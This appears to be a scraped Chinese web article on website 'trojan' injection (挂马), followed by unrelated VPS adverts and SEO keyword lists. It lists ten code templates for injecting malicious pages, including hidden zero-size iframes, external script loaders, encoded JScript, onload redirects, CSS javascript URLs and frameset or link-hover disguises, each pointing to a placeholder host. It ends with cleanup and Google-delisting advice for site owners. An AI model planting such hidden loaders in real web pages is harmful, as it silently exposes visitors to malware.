木马网站木马存在形式和清除方法

木马网站  时间:2021-02-20  阅读:()

网站木马存在形式和清除方法h123网址大全http://www.h123.net.cn

木马的存在形态有如下几种

一:框架挂马iframe src=地址width=0 height=0/iframe

二:js文件挂马

首先将以下代码document.write("iframe width='0' height='0' src='地址'/i frame

保存为xxx. js

则JS挂马代码为script language=javascript src=xxx. js/script

三:js变形加密

SCRIPT language="JScript.Encode"src=http://www.xxx.com/muma.txt/scriptmuma. txt可改成任意后缀

四:body挂马body onload="window. location='地址' ;"/body

五:隐蔽挂马top.document.body. innerHTML =top.document.body. innerHTML + ' \r\niframesrc="' ">http://www.xxxxxxxxxxxxxx"/iframe注意此网址

为虚拟仅为说明木马情况。

六:css中挂马body {

background-image:url (' javascript:document.write("scriptsrc=http://www.XXX.net/muma. j s/script") ' ) }

七:JAJA挂马

SCRIPT language=javascriptwindow.open ("地址

", "", "toolbar=no, location=no,directories=no, status=no,menubar=no, scro llbars=no,width=1,height=1") ;

/script

八:图片伪装htmliframe src="网马地址" height=0 width=0/iframeimg src="图片地址"/center

/html

九:伪装调用frameset rows="444,0" cols="*"frame src="打开网页" framborder="no" scrolling="auto"noresize marginwidth="0"margingheight="0"frame src="网马地址" frameborder="no" scrolling="no"noresize marginwidth="0"margingheight="0"

/frameset

十:高级欺骗a href="(迷惑连接地址显示这个地址指向木马地址)"onMouseOver="www_szweb_cn() ; return true;"页面要显示的内容/a

SCRIPT Language="JavaScript"function www_szweb_cn()

{var url="网马地址";open(url, "NewWindow", "toolbar=no, location=no,directories=no,

status=no,menubar=no, scrollbars=no,resizable=no, copyhistory=yes,width=800,height=600, left=10, top=10") ;}

/SCRIPT

清除木马的具体操作步骤如下

1)清除网页中的木马

删除现有的网页中的木马主要有这样类似的代码:iframe„或者„xxx. js/script

出现上面这些特征的代码如果里面包含的网址不是自己网站的那基本上就是中了木马了。我们比较常见的木马是iframe,对网站首页以及其它主要页面的源代码进行检查用记事本打开这些页面后 以“iframe”为关键字进行搜索找到后可以查看是否是挂马代码。不过碰上有经验的黑客会编写一段代码将整句挂马代码进行加密这样我们就很难找到网页中的挂马代码。这时可以将所有网页文件按修改时间进行排序如果有个别网页被修改我们可以很快地发现。

2)刺激google快速更新

木马被清除了 google上还是被屏蔽着。这时就想办法让google爬虫重新检索网站更新检索结果。这样 网站的屏蔽才能被解除。刺激google更新的的手段有如下一些

1)持续更新网站首页的文章

2)重新给google提交网站地图

3)为网站去找一些高质量的外链

4)申请审核。当网站有病毒后在google网站管理员工具内的“诊断”页面会有一个提示就是说网站含有恶意代码然后会提示你可以“申请审核”填写相关信息提交。h123网址大全http://www.h123.net.cn

JUSTG(5.99美元/月)最新5折优惠,KVM虚拟虚拟512Mkvm路线

Justg是一家俄罗斯VPS云服务器提供商,主要提供南非地区的VPS服务器产品,CN2高质量线路网络,100Mbps带宽,自带一个IPv4和8个IPv6,线路质量还不错,主要是用户较少,带宽使用率不高,比较空闲,不拥挤,比较适合面向非洲、欧美的用户业务需求,也适合追求速度快又需要冷门的朋友。justg的俄罗斯VPS云服务器位于莫斯科机房,到美国和中国速度都非常不错,到欧洲的平均延迟时间为40毫秒,...

华圣云 HuaSaint-阿里云国际站一级分销商,只需一个邮箱即可注册国际账号,可代充值

简介华圣云 HuaSaint是阿里云国际版一级分销商(诚招募二级代理),专业为全球企业客户与个人开发者提供阿里云国际版开户注册、认证、充值等服务,通过HuaSaint开通阿里云国际版只需要一个邮箱,不需要PayPal信用卡,不需要买海外电话卡,绝对的零门槛,零风险官方网站:www.huasaint.com企业名:huaSaint Tech Limited阿里云国际版都有什么优势?阿里云国际版的产品...

无忧云( 9.9元/首月),河南洛阳BGP 2核 2G,大连BGP线路 20G高防 ,

无忧云怎么样?无忧云服务器好不好?无忧云值不值得购买?无忧云,无忧云是一家成立于2017年的老牌商家旗下的服务器销售品牌,现由深圳市云上无忧网络科技有限公司运营,是正规持证IDC/ISP/IRCS商家,自营有国内雅安高防、洛阳BGP企业线路、香港CN2线路、国外服务器产品等,非常适合需要稳定的线路的用户,如游戏、企业建站业务需求和各种负载较高的项目,同时还有自营的高性能、高配置的BGP线路高防物理...

木马网站为你推荐
photoimpact教程Ulead PhotoImpact 如何把英文版的变成中文的!淘宝客推广淘宝客怎么推广什么是电子邮件 什么是电子邮件显卡温度多少正常显卡温度多少正常ps抠图技巧ps抠图多种技巧,越详细越好,急~~~~~~~ps抠图技巧photoshop抠图技巧今日热点怎么删除千牛里面的今日热点怎么取消_?淘宝店推广如何推广淘宝店安卓应用平台安卓系统支持的软件并不是那么多,为什么这么多人推崇?开机滚动条谁会调开机的滚动条
域名管理 重庆服务器托管 国外空间服务商 debian6 100x100头像 免费个人空间 ca187 石家庄服务器托管 西安主机 杭州电信宽带优惠 supercache 中国电信宽带测速 SmartAXMT800 zcloud ncp winserver2008r2 服务器是什么 vi命令 达拉斯 瓦工招聘 更多